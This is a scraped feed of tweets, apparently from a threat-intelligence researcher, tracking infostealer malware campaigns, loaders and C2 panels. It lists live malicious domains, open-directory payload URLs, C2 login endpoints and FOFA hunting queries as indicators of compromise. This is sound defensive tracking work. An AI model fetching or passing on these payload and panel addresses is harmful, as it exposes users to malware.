#Meta Stealer just got updated to v4.3 So it seems like malware developers are now using AI to sign builds in order to avoid detections? @NexusFuzzy I believe the same updates will be seen on Redline soon, as usual. Check everything 👇🏻👀

Tweet media one

2

14

35

@g0njxa

Who said what

7 months

Watch out Dynamics 365 *.microsoftcrmportals domains, abused at the "free vbucks" SEO poisoning campaign 🙄 /osvolunteers.microsoftcrmportals.com /fms.microsoftcrmportals.com /indspire.microsoftcrmportals.com /ecosoft.microsoftcrmportals.com /bggtscsp.microsoftcrmportals.com

Tweet media one

Tweet media two

0

5

36

@g0njxa

Who said what

1 year

hxxp://bratzen.duckdns.org/byte/ #Opendir Unknown #loader Hosting unkown payloads as a Comercial Loader for malware distribution. Stored as .txt with the client TG username. Seen on #PrivateLoader campaigns

Tweet media one

1

11

36

@g0njxa

Who said what

6 months

The infamous Raccoon stealer 🦝 has not been updated for long months and the activity in the wild has dropped (Talking about me I see no more Raccoon) Asked his staff, seems like the old coder left and there's a new one working on, so we must expect new updates soon! 👇⚙️

Tweet media one

0

6

36

@g0njxa

Who said what

3 months

Mac OS malware 🍎👾has been a trend in the past months... They are a threat that can be found in the wild pretty easily So why not to release some interviews with Mac OS infostealers? Today, a brief talk with Poseidon Stealer dev aka Rodrigo 👇👇

Tweet card media

Approaching stealers devs : a brief interview with Poseidon

To completely understand what’s going on in a market that has been growing in the last years I found mandatory to know which players are…

g0njxa.medium.com

0

9

36

@g0njxa

Who said what

11 months

@vxunderground @Elsaidy_pastry from Egypt 😭😭

Tweet media one

7

1

33

@g0njxa

Who said what

1 year

Hunting #Clearfake with @fofabot fid="QddxtK34KUI1XP5ujfy5bw==" Track the latest compromised domains /altenara.com /doolittles.be /easymall.co.th /megacarwreckers.com.au /filmovita.ba /staging.armipour.com /or-and.com /esmito.com /sistemajogodobicho.com There should be more!

Tweet media one

Tweet media two

Tweet media three

Tweet media four

1

8

35

@g0njxa

Who said what

1 month

i was there 😎 @_JohnHammond

Tweet media one

1

4

36

@g0njxa

Who said what

1 year

#Amadey is back on Privateloader campaigns after some days of inactivity. Loaded via #opendir (LgoogLoader) /85.217.144.143/files/ new C2 panel ⚙️ http://193.42.32.29/9bDc8sQ/Login.php Still not fixed, patch it NOW! @evstykas Full detonation: 👇👇

Tweet media one

Tweet media two

1

9

35

@g0njxa

Who said what

3 months

#Rhadamanthys kept their words and released new versions (v0.7) maintaining the malware project alive New API interface, frameworks rewritten and usage of AI for (mnemonic) phrases extraction? Full statement below! 👇

Tweet media one

@g0njxa

Who said what

6 months

The #Rhadamanthys Stealer project is not dead (after being banned from XSS and Exploit forums) His owner is now featuring a "new beginning", with future releases of new versions.

Tweet media one

Tweet media two

Tweet media three

1

6

18

1

7

34

@g0njxa

Who said what

1 year

#FAKEUPDATES live update /88.99.105.167 /63.141.252.148 /51.38.115.103 /paolomorettifurs.com/temp/EngineChromium.zip Drops from #opendir /77.105.147.44/river/strit/wantworkerpro.zip #Purelogs Stealer 185.138.164.41:7705 Detonation 👇👇

Tweet card media

Analysis https://paolomorettifurs.com/temp/EngineChromium.zip Malicious activity - Interactive...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

1

12

33

@g0njxa

Who said what

10 months

Something crazy is now being pushed by #Privateloader opens a pop-up window with a Microsoft error and a QR Code. /pcrrent.com (Microsoft phishing) 🇨🇳?? Financial information is asked and exfiltrated via POST to /pcrrent.com/index.php Full Detonation:

Tweet media one

Tweet media two

1

13

33

@g0njxa

Who said what

1 year

Track #HookBot panels with @fofabot fid="8ZfqDfBADcCVT8Cf796SUg==" recent ones (Novemeber): /bravevikingser.xyz /91.92.249.18 /20.39.184.218 /161.35.235.125 /178.23.190.21 /87.98.185.14 /199.101.135.49 /94.156.64.181 /91.92.245.80 /91.215.85.153 more!

Tweet media one

Tweet media two

1

11

33

@g0njxa

Who said what

2 months

Somebody found a tg bot api hash from snake keylogger (like me) and decided to share free malware on all chats A stealer with no detections, what is it? c2: http://128.199.113.162/XtfcshEgt/upwawsfrg.php panel: 128.199.113.162 @ViriBack Detonation:

Tweet media one

Tweet media two

7

6

34

@g0njxa

Who said what

4 months

#META stealer v5.0 is actually released after the previous announcement. Featuring TLS encryption between build and C2 panel (as seen in other stealers like Lumma or Vidar in recent updates), among other new and fancy features. Check everything 👇

Tweet media one

@g0njxa

Who said what

4 months

#META stealer announced recently an incoming update on June 17th featuring a "new, unique and individual system" Current version is v4.6 from May 23th Let's see what they prepare... 👀

Tweet media one

Tweet media two

0

3

12

0

10

33

@g0njxa

Who said what

10 months

The use of SSL certificates on #stealers commn. to C2 servers is becoming popular among this malware projects. Exfiltration over HTTPS allegedly makes them to "receive less detections on c2s and prolong its life" A recent example is #Lumma Stealer 👇👀

Tweet media one

1

8

32

@g0njxa

Who said what

3 months

CrowdStrike outage is fake, there is no incident!!!! We hacked into company using Crowdstrike and everything was good, stop spreading disinformation in the media you liars!!!! 😂

Tweet media one

Tweet media two

3

0

33

@g0njxa

Who said what

18 days

Fake @PocketUniverseZ impersonating Chrome Extensions Web Store sharing unidentified malware /universepocket.top > /pocketuniverre.store Sample (zipped): Sample (raw): Spread on Youtube:

Tweet media one

Tweet media two

Tweet media three

4

10

33